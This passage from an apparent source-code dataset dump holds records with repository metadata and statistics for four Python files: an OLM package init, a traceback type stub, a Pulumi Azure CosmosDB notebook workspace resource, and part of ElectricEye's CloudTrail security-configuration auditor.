| 52.439024 | 160 | 0.599587 | 2,122 | 19,350 | 5.446748 | 0.061734 | 0.056757 | 0.103824 | 0.031839 | 0.894791 | 0.893407 | 0.875151 | 0.839678 | 0.806974 | 0.806974 | 0 | 0.037637 | 0.243411 | 19,350 | 368 | 161 | 52.581522 | 0.751844 | 0.05292 | 0 | 0.772861 | 0 | 0 | 0.073693 | 0.003068 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00885 | false | 0.056047 | 0.014749 | 0 | 0.023599 | 0.19174 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
31b29b93dff0d92cd5a2776167eeb5817659d53a | 170 | py | Python | python/olm/__init__.py | aapierce0/OLMKit | b2b93d7a1f03a620c5ee87491076bf18764adeb4 | [
"Apache-2.0"
] | 1 | 2017-09-22T09:56:49.000Z | 2017-09-22T09:56:49.000Z | python/olm/__init__.py | aapierce0/OLMKit | b2b93d7a1f03a620c5ee87491076bf18764adeb4 | [
"Apache-2.0"
] | null | null | null | python/olm/__init__.py | aapierce0/OLMKit | b2b93d7a1f03a620c5ee87491076bf18764adeb4 | [
"Apache-2.0"
] | null | null | null | from .account import Account
from .session import Session
from .outbound_group_session import OutboundGroupSession
from .inbound_group_session import InboundGroupSession
| 34 | 56 | 0.882353 | 20 | 170 | 7.3 | 0.45 | 0.267123 | 0.246575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094118 | 170 | 4 | 57 | 42.5 | 0.948052 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
31c9ce756fd9a94a5af34808fe4229a858ed5a5b | 159 | py | Python | stubs/3.2/traceback.py | TimSimpsonR/mypy | 5e6fd6335e0662b0477e1d678269f33e6f4194ba | [
"PSF-2.0"
] | 1 | 2019-06-27T11:34:27.000Z | 2019-06-27T11:34:27.000Z | stubs/3.2/traceback.py | silky/mypy | de6a8d3710df9f49109cb682f2092e4967bfb92c | [
"PSF-2.0"
] | null | null | null | stubs/3.2/traceback.py | silky/mypy | de6a8d3710df9f49109cb682f2092e4967bfb92c | [
"PSF-2.0"
] | null | null | null | # Stubs for traceback
import typing
# TODO signatures
def format_tb(traceback): pass
def print_ecx(limit=None, file=None, chain=True): pass
# TODO add more
| 15.9 | 54 | 0.761006 | 25 | 159 | 4.76 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150943 | 159 | 9 | 55 | 17.666667 | 0.881481 | 0.308176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0 | 1 | 0.666667 | false | 0.666667 | 0.333333 | 0 | 1 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
31ca64452947fcba271969326f023da684813f47 | 16,016 | py | Python | sdk/python/pulumi_azure/cosmosdb/notebook_workspace.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/cosmosdb/notebook_workspace.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/cosmosdb/notebook_workspace.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['NotebookWorkspaceArgs', 'NotebookWorkspace']
@pulumi.input_type
class NotebookWorkspaceArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a NotebookWorkspace resource.
:param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
:param pulumi.Input[str] name: The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _NotebookWorkspaceState:
def __init__(__self__, *,
account_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_endpoint: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering NotebookWorkspace resources.
:param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
:param pulumi.Input[str] name: The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
:param pulumi.Input[str] server_endpoint: Specifies the endpoint of Notebook server.
"""
if account_name is not None:
pulumi.set(__self__, "account_name", account_name)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if server_endpoint is not None:
pulumi.set(__self__, "server_endpoint", server_endpoint)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="serverEndpoint")
def server_endpoint(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the endpoint of Notebook server.
"""
return pulumi.get(self, "server_endpoint")
@server_endpoint.setter
def server_endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_endpoint", value)
class NotebookWorkspace(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an SQL Notebook Workspace.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.cosmosdb.Account("exampleAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
offer_type="Standard",
kind="GlobalDocumentDB",
consistency_policy=azure.cosmosdb.AccountConsistencyPolicyArgs(
consistency_level="BoundedStaleness",
),
geo_locations=[azure.cosmosdb.AccountGeoLocationArgs(
location=example_resource_group.location,
failover_priority=0,
)])
example_notebook_workspace = azure.cosmosdb.NotebookWorkspace("exampleNotebookWorkspace",
resource_group_name=example_account.resource_group_name,
account_name=example_account.name)
```
## Import
=SQL Notebook Workspaces can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:cosmosdb/notebookWorkspace:NotebookWorkspace example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DocumentDB/databaseAccounts/account1/notebookWorkspaces/notebookWorkspace1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
:param pulumi.Input[str] name: The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: NotebookWorkspaceArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an SQL Notebook Workspace.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.cosmosdb.Account("exampleAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
offer_type="Standard",
kind="GlobalDocumentDB",
consistency_policy=azure.cosmosdb.AccountConsistencyPolicyArgs(
consistency_level="BoundedStaleness",
),
geo_locations=[azure.cosmosdb.AccountGeoLocationArgs(
location=example_resource_group.location,
failover_priority=0,
)])
example_notebook_workspace = azure.cosmosdb.NotebookWorkspace("exampleNotebookWorkspace",
resource_group_name=example_account.resource_group_name,
account_name=example_account.name)
```
## Import
=SQL Notebook Workspaces can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:cosmosdb/notebookWorkspace:NotebookWorkspace example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DocumentDB/databaseAccounts/account1/notebookWorkspaces/notebookWorkspace1
```
:param str resource_name: The name of the resource.
:param NotebookWorkspaceArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(NotebookWorkspaceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = NotebookWorkspaceArgs.__new__(NotebookWorkspaceArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["server_endpoint"] = None
super(NotebookWorkspace, __self__).__init__(
'azure:cosmosdb/notebookWorkspace:NotebookWorkspace',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_endpoint: Optional[pulumi.Input[str]] = None) -> 'NotebookWorkspace':
"""
Get an existing NotebookWorkspace resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
:param pulumi.Input[str] name: The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
:param pulumi.Input[str] server_endpoint: Specifies the endpoint of Notebook server.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _NotebookWorkspaceState.__new__(_NotebookWorkspaceState)
__props__.__dict__["account_name"] = account_name
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["server_endpoint"] = server_endpoint
return NotebookWorkspace(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Output[str]:
"""
The name of the Cosmos DB Account to create the SQL Notebook Workspace within. Changing this forces a new SQL Notebook Workspace to be created.
"""
return pulumi.get(self, "account_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name which should be used for this SQL Notebook Workspace. Possible value is `default`. Changing this forces a new SQL Notebook Workspace to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the SQL Notebook Workspace should exist. Changing this forces a new SQL Notebook Workspace to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="serverEndpoint")
def server_endpoint(self) -> pulumi.Output[str]:
"""
Specifies the endpoint of Notebook server.
"""
return pulumi.get(self, "server_endpoint")
| 47.666667 | 252 | 0.675262 | 1,872 | 16,016 | 5.5625 | 0.104701 | 0.066167 | 0.06319 | 0.052819 | 0.829444 | 0.804475 | 0.794296 | 0.773072 | 0.768174 | 0.749064 | 0 | 0.006007 | 0.241259 | 16,016 | 335 | 253 | 47.808955 | 0.850889 | 0.453484 | 0 | 0.570552 | 1 | 0 | 0.111297 | 0.011824 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153374 | false | 0.006135 | 0.030675 | 0 | 0.276074 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
31eb79af90c112c2f02e5454ac4e573698470b24 | 32,303 | py | Python | eeauditor/auditors/aws/AWS_CloudTrail_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 442 | 2020-03-15T20:56:36.000Z | 2022-03-31T22:13:07.000Z | eeauditor/auditors/aws/AWS_CloudTrail_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 57 | 2020-03-15T22:09:56.000Z | 2022-03-31T13:17:06.000Z | eeauditor/auditors/aws/AWS_CloudTrail_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 59 | 2020-03-15T21:19:10.000Z | 2022-03-31T15:01:31.000Z | #This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
from check_register import CheckRegister
registry = CheckRegister()
# import boto3 clients
cloudtrail = boto3.client("cloudtrail")
# loop through trails
def list_trails(cache):
response = cache.get("list_trails")
if response:
return response
cache["list_trails"] = cloudtrail.list_trails()
return cache["list_trails"]
@registry.register_check("cloudtrail")
def cloudtrail_multi_region_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CloudTrail.1] CloudTrail trails should be multi-region"""
trail = list_trails(cache=cache)
myCloudTrails = trail["Trails"]
for trails in myCloudTrails:
trailArn = str(trails["TrailARN"])
trailName = str(trails["Name"])
response = cloudtrail.describe_trails(trailNameList=[trailArn], includeShadowTrails=False)
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
for details in response["trailList"]:
multiRegionCheck = str(details["IsMultiRegionTrail"])
if multiRegionCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": trailArn + "/cloudtrail-multi-region-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": trailArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[CloudTrail.1] CloudTrail trails should be multi-region",
"Description": "CloudTrail trail "
+ trailName
+ " is not a multi-region trail. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your trail should be multi-region refer to the Receiving CloudTrail Log Files from Multiple Regions section of the AWS CloudTrail User Guide",
"Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/receive-cloudtrail-log-files-from-multiple-regions.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudTrailTrail",
"Id": trailArn,
"Partition": awsPartition,
"Region": awsRegion,
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": trailArn + "/cloudtrail-multi-region-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": trailArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CloudTrail.1] CloudTrail trails should be multi-region",
"Description": "CloudTrail trail " + trailName + " is a multi-region trail.",
"Remediation": {
"Recommendation": {
"Text": "If your trail should be multi-region refer to the Receiving CloudTrail Log Files from Multiple Regions section of the AWS CloudTrail User Guide",
"Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/receive-cloudtrail-log-files-from-multiple-regions.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudTrailTrail",
"Id": trailArn,
"Partition": awsPartition,
"Region": awsRegion,
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("cloudtrail")
def cloudtrail_cloudwatch_logging_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CloudTrail.2] CloudTrail trails should have CloudWatch logging configured"""
trail = list_trails(cache=cache)
myCloudTrails = trail["Trails"]
for trails in myCloudTrails:
trailArn = str(trails["TrailARN"])
trailName = str(trails["Name"])
response = cloudtrail.describe_trails(trailNameList=[trailArn], includeShadowTrails=False)
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
for details in response["trailList"]:
try:
# this is a passing check
cloudwatchLogCheck = str(details["CloudWatchLogsLogGroupArn"])
finding = {
"SchemaVersion": "2018-10-08",
"Id": trailArn + "/cloudtrail-cloudwatch-logging-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": trailArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CloudTrail.2] CloudTrail trails should have CloudWatch logging configured",
"Description": "CloudTrail trail "
+ trailName
+ " has CloudWatch Logging configured.",
"Remediation": {
"Recommendation": {
"Text": "If your trail should send logs to CloudWatch refer to the Monitoring CloudTrail Log Files with Amazon CloudWatch Logs section of the AWS CloudTrail User Guide",
"Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/monitor-cloudtrail-log-files-with-cloudwatch-logs.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudTrailTrail",
"Id": trailArn,
"Partition": awsPartition,
"Region": awsRegion,
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
except Exception as e:
if str(e) == "'CloudWatchLogsLogGroupArn'":
finding = {
"SchemaVersion": "2018-10-08",
"Id": trailArn + "/cloudtrail-cloudwatch-logging-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": trailArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[CloudTrail.2] CloudTrail trails should have CloudWatch logging configured",
"Description": "CloudTrail trail "
+ trailName
+ " does not have CloudWatch Logging configured. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your trail should send logs to CloudWatch refer to the Monitoring CloudTrail Log Files with Amazon CloudWatch Logs section of the AWS CloudTrail User Guide",
"Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/monitor-cloudtrail-log-files-with-cloudwatch-logs.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudTrailTrail",
"Id": trailArn,
"Partition": awsPartition,
"Region": awsRegion,
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
print(e)
@registry.register_check("cloudtrail")
def cloudtrail_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CloudTrail.3] CloudTrail trails should be encrypted by KMS"""
trail = list_trails(cache=cache)
myCloudTrails = trail["Trails"]
for trails in myCloudTrails:
trailArn = str(trails["TrailARN"])
trailName = str(trails["Name"])
response = cloudtrail.describe_trails(trailNameList=[trailArn], includeShadowTrails=False)
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
for details in response["trailList"]:
try:
# this is a passing check
encryptionCheck = str(details["KmsKeyId"])
finding = {
"SchemaVersion": "2018-10-08",
"Id": trailArn + "/cloudtrail-kms-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": trailArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CloudTrail.3] CloudTrail trails should be encrypted by KMS",
"Description": "CloudTrail trail " + trailName + " is encrypted by KMS.",
"Remediation": {
"Recommendation": {
"Text": "If your trail should be encrypted with SSE-KMS refer to the Encrypting CloudTrail Log Files with AWS KMS–Managed Keys (SSE-KMS) section of the AWS CloudTrail User Guide",
"Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/encrypting-cloudtrail-log-files-with-aws-kms.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudTrailTrail",
"Id": trailArn,
"Partition": awsPartition,
"Region": awsRegion,
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
except Exception as e:
if str(e) == "'KmsKeyId'":
finding = {
"SchemaVersion": "2018-10-08",
"Id": trailArn + "/cloudtrail-kms-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": trailArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[CloudTrail.3] CloudTrail trails should be encrypted by KMS",
"Description": "CloudTrail trail "
+ trailName
+ " is not encrypted by KMS. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your trail should be encrypted with SSE-KMS refer to the Encrypting CloudTrail Log Files with AWS KMS–Managed Keys (SSE-KMS) section of the AWS CloudTrail User Guide",
"Url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/encrypting-cloudtrail-log-files-with-aws-kms.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudTrailTrail",
"Id": trailArn,
"Partition": awsPartition,
"Region": awsRegion,
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
